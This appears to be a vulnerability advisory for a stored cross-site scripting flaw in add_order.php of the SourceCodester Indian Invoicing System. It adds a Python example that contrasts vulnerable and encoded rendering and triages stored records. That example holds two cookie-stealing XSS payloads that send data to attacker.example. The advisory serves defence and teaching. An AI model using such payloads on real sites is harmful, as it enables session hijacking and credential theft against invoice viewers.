Impact
A cross-site scripting flaw exists in the add_order.php component of the SourceCodester Indian Invoicing System. By manipulating the customer_name argument, an attacker can inject arbitrary client-side script that is rendered, without encoding, when the invoice template is displayed. The root cause is missing output encoding and input validation for user-supplied data (CWE-79). The record also carries a CWE-94 (code injection) marker; the description does not confirm that the flaw allows execution of PHP on the server, and nothing in the advisory establishes that capability. Successful exploitation runs JavaScript in the context of a victim's browser session, enabling session hijacking, credential theft, phishing, or defacement of the invoice view.
Affected Systems
SourceCodester Indian Invoicing System, versions 0.x and 1.0. The vulnerability affects the Invoice Template Render component and the add_order.php script, which accepts the customer_name value submitted by the user. Because the template echoes that value without output encoding, every user who views an affected invoice is exposed to client-side script execution, not only the user who submitted it.
Risk and Exploitability
The vulnerability is exploited by sending a crafted request to the add_order.php endpoint with a malicious customer_name value. The trigger is remote and requires no authentication, so any attacker with network access to the web server can plant the payload; the script then executes in the browser of whoever later views the resulting invoice. The medium CVSS score reflects that the direct impact is confined to client browsers, but the absence of mitigations such as output encoding, input validation or a Content Security Policy makes successful execution of the injected script likely. Exploitation of a PHP code execution path (CWE-94) is not confirmed; the marker means only that such a consequence should be ruled out during triage rather than assumed. Overall, the risk remains moderate to high for unpatched installations. Until a fixed version is deployed, operators should encode customer_name at the point of output (in PHP, htmlspecialchars with ENT_QUOTES, so that attribute contexts are covered as well as element text) and review already-stored order records for markup, since a payload planted before the fix keeps firing until the stored value is cleaned.
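The following is an added example and is not code from the Indian Invoicing System project or from the advisory. It models the add_order.php -> invoice-template data flow described in the Impact and Risk sections in Python so that the CWE-79 failure mode, the effect of output encoding, and a triage pass over stored records can be run offline; the real project is PHP, and the counterpart of escape_html() there is htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8'). The template layout, the field names, the two payloads and the sample rows are all assumptions constructed for the example.

```python
"""Added example, not code from the SourceCodester Indian Invoicing System.

Models the add_order.php -> invoice-template data flow so the CWE-79
failure mode can be exercised offline. The project is PHP; the PHP
counterpart of escape_html() is
htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8').
Template layout, field names, payloads and sample rows are assumptions.
"""
import html
from html.parser import HTMLParser
from typing import Dict, List

# Constructed payloads of the kind the advisory describes. The first is a
# plain script element; the second breaks out of a double-quoted attribute,
# which an encoder that leaves quotes alone (htmlspecialchars without
# ENT_QUOTES) would fail to neutralise.
SCRIPT_PAYLOAD = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'
ATTR_PAYLOAD = '" autofocus onfocus="fetch(\'https://attacker.example/?c=\'+document.cookie)'


def escape_html(value: str) -> str:
    """Encode for HTML text and for double- and single-quoted attributes."""
    return html.escape(value, quote=True)


def render_invoice_vulnerable(customer_name: str) -> str:
    """Mirrors the flaw: the stored customer_name is interpolated raw into
    both an element-text context and an attribute context."""
    return (
        f"<h2>Invoice for {customer_name}</h2>\n"
        f'<input name="customer_name" value="{customer_name}">'
    )


def render_invoice_fixed(customer_name: str) -> str:
    """Same template, output-encoded at the point of rendering."""
    safe = escape_html(customer_name)
    return (
        f"<h2>Invoice for {safe}</h2>\n"
        f'<input name="customer_name" value="{safe}">'
    )


class ActiveContentFinder(HTMLParser):
    """Tokenises the rendered page the way a browser would and records
    script elements, on* event-handler attributes and javascript: URLs.
    A parser is used instead of a regex because an encoded payload still
    contains the literal text 'onfocus=' inside an attribute value."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: List[str] = []

    def handle_starttag(self, tag, attrs) -> None:
        if tag == "script":
            self.findings.append("script element")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"event handler {name} on <{tag}>")
            if name in ("href", "src", "action") and value is not None:
                if value.strip().lower().startswith("javascript:"):
                    self.findings.append(f"javascript: URL in {name} on <{tag}>")


def find_active_content(rendered: str) -> List[str]:
    """Return a list of things in the rendered HTML that a browser would run."""
    finder = ActiveContentFinder()
    finder.feed(rendered)
    finder.close()
    return finder.findings


# Constructed sample of what the orders table might hold after an attack.
SAMPLE_ROWS: List[Dict[str, object]] = [
    {"id": 1, "customer_name": "Priya Sharma"},
    {"id": 2, "customer_name": "O'Brien & Sons"},  # benign punctuation
    {"id": 3, "customer_name": SCRIPT_PAYLOAD},
    {"id": 4, "customer_name": ATTR_PAYLOAD},
]


def triage_stored_rows(rows: List[Dict[str, object]]) -> Dict[int, List[str]]:
    """Incident-response check: replay each stored customer_name through the
    vulnerable template and report rows whose value would execute. Payloads
    planted before a fix keep firing until the stored value is cleaned."""
    hits: Dict[int, List[str]] = {}
    for row in rows:
        findings = find_active_content(render_invoice_vulnerable(str(row["customer_name"])))
        if findings:
            hits[int(row["id"])] = findings
    return hits


if __name__ == "__main__":
    for payload in (SCRIPT_PAYLOAD, ATTR_PAYLOAD):
        print("vulnerable:", find_active_content(render_invoice_vulnerable(payload)))
        print("fixed     :", find_active_content(render_invoice_fixed(payload)))
    print("rows needing cleanup:", triage_stored_rows(SAMPLE_ROWS))
```

The attribute-breakout payload is the reason the remediation has to encode quotes and not just angle brackets: rendered raw, it turns the value attribute into an autofocus/onfocus pair that fires without any user interaction, while the encoded form stays a single harmless attribute value. The triage function reuses the vulnerable renderer deliberately, so that it flags exactly the stored values that would have executed in the unpatched template.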
OpenCVE Enrichment